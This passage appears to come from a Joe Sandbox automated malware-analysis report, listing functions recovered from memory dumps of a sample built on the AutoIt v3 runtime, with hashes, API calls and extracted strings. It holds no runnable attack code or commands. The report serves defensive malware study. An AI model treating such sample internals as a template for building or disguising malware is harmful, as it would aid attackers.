                                    • Opcode ID: 76fe20f0a280c35f55d144559c0a9c7426ea4151a524c502f5250620f387c912
                                    • Instruction ID: 4dd13da9c55199cb62e2f8016db80bb8c83acd6400a0cec99782caee45a329bb
                                    • Opcode Fuzzy Hash: 76fe20f0a280c35f55d144559c0a9c7426ea4151a524c502f5250620f387c912
                                    • Instruction Fuzzy Hash: 47127B70A00209EFDF04DFA9D995AEEB7F5FF58300F208569E806E7294EB35A915CB50
                                    Function 0013AF50 Relevance: .5, Instructions: 514COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Exception@8Throwstd::exception::exception
                                    • String ID:
                                    • API String ID: 3728558374-0
                                    • Opcode ID: dedaa76b2127911e7b7a090099105e4b014c9a29e6e2f897ecbb8e80515c4ee4
                                    • Instruction ID: 5a14488c7758b94d0116227b12aac092a99781cf2e0bf816ea4e3646795a40dc
                                    • Opcode Fuzzy Hash: dedaa76b2127911e7b7a090099105e4b014c9a29e6e2f897ecbb8e80515c4ee4
                                    • Instruction Fuzzy Hash: FC02A070E00209DFCF08DF68D991AAEBBB5FF55300F158069E806EB295EB35DA15CB91
                                    Function 001502A4 Relevance: .3, Instructions: 345COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                    • Instruction ID: bb3a4752fbdd2e7ff92c30303ed94c062fad31d590cee20d74c4e5ef0f28fdac
                                    • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                    • Instruction Fuzzy Hash: 25C1B4322051934AEF6E467A843453EBAA15FA17B331B076DD8B7CF5E5EF20C528D620
                                    Function 001506D9 Relevance: .3, Instructions: 341COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                    • Instruction ID: b2ebb98f4c9b2638d7aee777fcf4307cbc79d3aeadc049ac65da56416052a4b5
                                    • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                    • Instruction Fuzzy Hash: 24C1C33220519349EF2E4679C43453EBBA15BA2BB331B076DD8B6CF5E5EF20C528D620
                                    Function 0014FA57 Relevance: .3, Instructions: 323COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                    • Instruction ID: 06226c478f837a9af90d0bfe65b50056763056c86582356d70fbe51873e86799
                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                    • Instruction Fuzzy Hash: 1FC1A33220509309EF2D4639C47453EBAA15BA2BB231B077DD8B7DB6F5EF20C526D620
                                    Function 0018A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 0018A2FE
                                    • DeleteObject.GDI32(00000000), ref: 0018A310
                                    • DestroyWindow.USER32 ref: 0018A31E
                                    • GetDesktopWindow.USER32 ref: 0018A338
                                    • GetWindowRect.USER32(00000000), ref: 0018A33F
                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0018A480
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0018A490
                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0018A4D8
                                    • GetClientRect.USER32(00000000,?), ref: 0018A4E4
                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0018A51E
                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0018A540
                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0018A553
                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0018A55E
                                    • GlobalLock.KERNEL32(00000000), ref: 0018A567
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0018A576
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0018A57F
                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0018A586
                                    • GlobalFree.KERNEL32(00000000), ref: 0018A591
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 0018A5A3
                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,001BD9BC,00000000), ref: 0018A5B9
                                    • GlobalFree.KERNEL32(00000000), ref: 0018A5C9
                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0018A5EF
                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0018A60E
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0018A630
                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0018A81D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                    • String ID: $AutoIt v3$DISPLAY$static
                                    • API String ID: 2211948467-2373415609
                                    • Opcode ID: 8ea30a0c55601f5713a64635809fa8068109ddcb5db5c5227e13fc6d4078a647
                                    • Instruction ID: 10ea6f561b3e0efe4e50e3daa6a08a414258fe4ea71ba60607d01b42f6a38697
                                    • Opcode Fuzzy Hash: 8ea30a0c55601f5713a64635809fa8068109ddcb5db5c5227e13fc6d4078a647
                                    • Instruction Fuzzy Hash: 0D024975900204EFDB189FA4DD89EAE7BB9EF48310F048259F905AB2A0DB70AD41CF60
                                    Function 0019D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetTextColor.GDI32(?,00000000), ref: 0019D2DB
                                    • GetSysColorBrush.USER32(0000000F), ref: 0019D30C
                                    • GetSysColor.USER32(0000000F), ref: 0019D318
                                    • SetBkColor.GDI32(?,000000FF), ref: 0019D332
                                    • SelectObject.GDI32(?,00000000), ref: 0019D341
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0019D36C
                                    • GetSysColor.USER32(00000010), ref: 0019D374
                                    • CreateSolidBrush.GDI32(00000000), ref: 0019D37B
                                    • FrameRect.USER32(?,?,00000000), ref: 0019D38A
                                    • DeleteObject.GDI32(00000000), ref: 0019D391
                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0019D3DC
                                    • FillRect.USER32(?,?,00000000), ref: 0019D40E
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0019D439
                                      • Part of subcall function 0019D575: GetSysColor.USER32(00000012), ref: 0019D5AE
                                      • Part of subcall function 0019D575: SetTextColor.GDI32(?,?), ref: 0019D5B2
                                      • Part of subcall function 0019D575: GetSysColorBrush.USER32(0000000F), ref: 0019D5C8
                                      • Part of subcall function 0019D575: GetSysColor.USER32(0000000F), ref: 0019D5D3
                                      • Part of subcall function 0019D575: GetSysColor.USER32(00000011), ref: 0019D5F0
                                      • Part of subcall function 0019D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0019D5FE
                                      • Part of subcall function 0019D575: SelectObject.GDI32(?,00000000), ref: 0019D60F
                                      • Part of subcall function 0019D575: SetBkColor.GDI32(?,00000000), ref: 0019D618
                                      • Part of subcall function 0019D575: SelectObject.GDI32(?,?), ref: 0019D625
                                      • Part of subcall function 0019D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0019D644
                                      • Part of subcall function 0019D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0019D65B
                                      • Part of subcall function 0019D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0019D670
                                      • Part of subcall function 0019D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0019D698
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                    • String ID:
                                    • API String ID: 3521893082-0
                                    • Opcode ID: a368af6ab3ef0e4d67cf64b0cdc8c288fe69e81e2bbd1ec92cc1a9926bc3e1c3
                                    • Instruction ID: 165f2f239238d42834d4fe04e30332e0ce63a6db46462075200f7e6bdf9bad2b
                                    • Opcode Fuzzy Hash: a368af6ab3ef0e4d67cf64b0cdc8c288fe69e81e2bbd1ec92cc1a9926bc3e1c3
                                    • Instruction Fuzzy Hash: 7C916E72408301BFDB149F64EC48A6BBBB9FF89325F100B19F962965E0E771D984CB52
                                    Function 0017DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 0017DBD6
                                    • GetDriveTypeW.KERNEL32(?,001CDC54,?,\\.\,001CDC00), ref: 0017DCC3
                                    • SetErrorMode.KERNEL32(00000000,001CDC54,?,\\.\,001CDC00), ref: 0017DE29
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DriveType
                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                    • API String ID: 2907320926-4222207086
                                    • Opcode ID: 18c55688619f373ee1461bcfe27dc150f702a5babd733fd936108dc46c13f895
                                    • Instruction ID: 24c1fa2fd90ae5d11606d4e5e07ca098a3e863af134f1b6fd8caaec6870108f8
                                    • Opcode Fuzzy Hash: 18c55688619f373ee1461bcfe27dc150f702a5babd733fd936108dc46c13f895
                                    • Instruction Fuzzy Hash: F451E430208B4AABC328DF61E98582DB7B1FFA4740F21D85EF02B9B2D1DB60D945D742
                                    Function 0013CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                    • API String ID: 1038674560-86951937
                                    • Opcode ID: 6170ece67899b4350523805837443e0b0c6af3cb97191c9a50ab90a677d1fafd
                                    • Instruction ID: 5576a6c8f6a9f971100d0bc7a53cfa3c158f8b33e863b078a7d2ae7bd133fd20
                                    • Opcode Fuzzy Hash: 6170ece67899b4350523805837443e0b0c6af3cb97191c9a50ab90a677d1fafd
                                    • Instruction Fuzzy Hash: 1781D135640205BBDB25AAA8DC82FBE7769AF36700F054039F906BA1C6EB70D945C7E1
                                    Function 0014B8FD Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 491windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DestroyWindow.USER32 ref: 0014B98B
                                    • DeleteObject.GDI32(00000000), ref: 0014B9CD
                                    • DeleteObject.GDI32(00000000), ref: 0014B9D8
                                    • DestroyCursor.USER32(00000000), ref: 0014B9E3
                                    • DestroyWindow.USER32(00000000), ref: 0014B9EE
                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 001AD2AA
                                    • 6FC70200.COMCTL32(?,000000FF,?), ref: 001AD2E3
                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 001AD711
                                      • Part of subcall function 0014B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0014B759,?,00000000,?,?,?,?,0014B72B,00000000,?), ref: 0014BA58
                                    • SendMessageW.USER32 ref: 001AD758
                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 001AD76F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: DestroyMessageSendWindow$DeleteObject$C70200CursorInvalidateMoveRect
                                    • String ID: 0
                                    • API String ID: 1900234348-4108050209
                                    • Opcode ID: 138c65d4da6935dc9c6a0df4b16431851bf167af2afade6b3f60219b8679834d
                                    • Instruction ID: 0ace6eb5d2042930ed794c463438c30fed049d06f723270e682c9b57452e9fee
                                    • Opcode Fuzzy Hash: 138c65d4da6935dc9c6a0df4b16431851bf167af2afade6b3f60219b8679834d
                                    • Instruction Fuzzy Hash: 5A127E74504601DFDB19CF24E884BA9B7F5BF1A308F144569F98ACBA62C731EC85CB51
                                    Function 0019C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0019C788
                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0019C83E
                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 0019C859
                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0019CB15
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window
                                    • String ID: 0
                                    • API String ID: 2326795674-4108050209
                                    • Opcode ID: b9bc2442059339970c9e84b2dafc93191c01909de6d72a6fbeb90b71f0347fb9
                                    • Instruction ID: c61b51f41af12158a1c4da5a31186832f9b63c3552c0dcd7afbb4ce6c51842c0
                                    • Opcode Fuzzy Hash: b9bc2442059339970c9e84b2dafc93191c01909de6d72a6fbeb90b71f0347fb9
                                    • Instruction Fuzzy Hash: 9EF1BF71604301AFEB258F28CC89BAABBE4FF49354F080629F5D9D62A1D774D984CBD1
                                    Function 0019638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,001CDC00), ref: 00196449
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                    • API String ID: 3964851224-45149045
                                    • Opcode ID: f83f42b424b8afb1204549166f0c39b010f487e12211f0845c092609645fb3ad
                                    • Instruction ID: a7061567efe3771e4208cef625b0c75cbbf02e4a2e318c5f18f4c00417d9ad7c
                                    • Opcode Fuzzy Hash: f83f42b424b8afb1204549166f0c39b010f487e12211f0845c092609645fb3ad
                                    • Instruction Fuzzy Hash: 80C174306047458BCF08EF50C591A6E77E5BFA5344F05485DF88AAB3A2DB30ED4ACB92
                                    Function 0019D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSysColor.USER32(00000012), ref: 0019D5AE
                                    • SetTextColor.GDI32(?,?), ref: 0019D5B2
                                    • GetSysColorBrush.USER32(0000000F), ref: 0019D5C8
                                    • GetSysColor.USER32(0000000F), ref: 0019D5D3
                                    • CreateSolidBrush.GDI32(?), ref: 0019D5D8
                                    • GetSysColor.USER32(00000011), ref: 0019D5F0
                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0019D5FE
                                    • SelectObject.GDI32(?,00000000), ref: 0019D60F
                                    • SetBkColor.GDI32(?,00000000), ref: 0019D618
                                    • SelectObject.GDI32(?,?), ref: 0019D625
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0019D644
                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0019D65B
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0019D670
                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0019D698
                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0019D6BF
                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0019D6DD
                                    • DrawFocusRect.USER32(?,?), ref: 0019D6E8
                                    • GetSysColor.USER32(00000011), ref: 0019D6F6
                                    • SetTextColor.GDI32(?,00000000), ref: 0019D6FE
                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0019D712
                                    • SelectObject.GDI32(?,0019D2A5), ref: 0019D729
                                    • DeleteObject.GDI32(?), ref: 0019D734
                                    • SelectObject.GDI32(?,?), ref: 0019D73A
                                    • DeleteObject.GDI32(?), ref: 0019D73F
                                    • SetTextColor.GDI32(?,?), ref: 0019D745
                                    • SetBkColor.GDI32(?,?), ref: 0019D74F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                    • String ID:
                                    • API String ID: 1996641542-0
                                    • Opcode ID: d1dd5225c4c5821144de2e0b4bc65c05700ed587e6f057c2e7adee0c180e72ce
                                    • Instruction ID: dde1c0b883d61046a5ec7415eca4bb41c82fe7ebec947d433bf3ac73a0b69be5
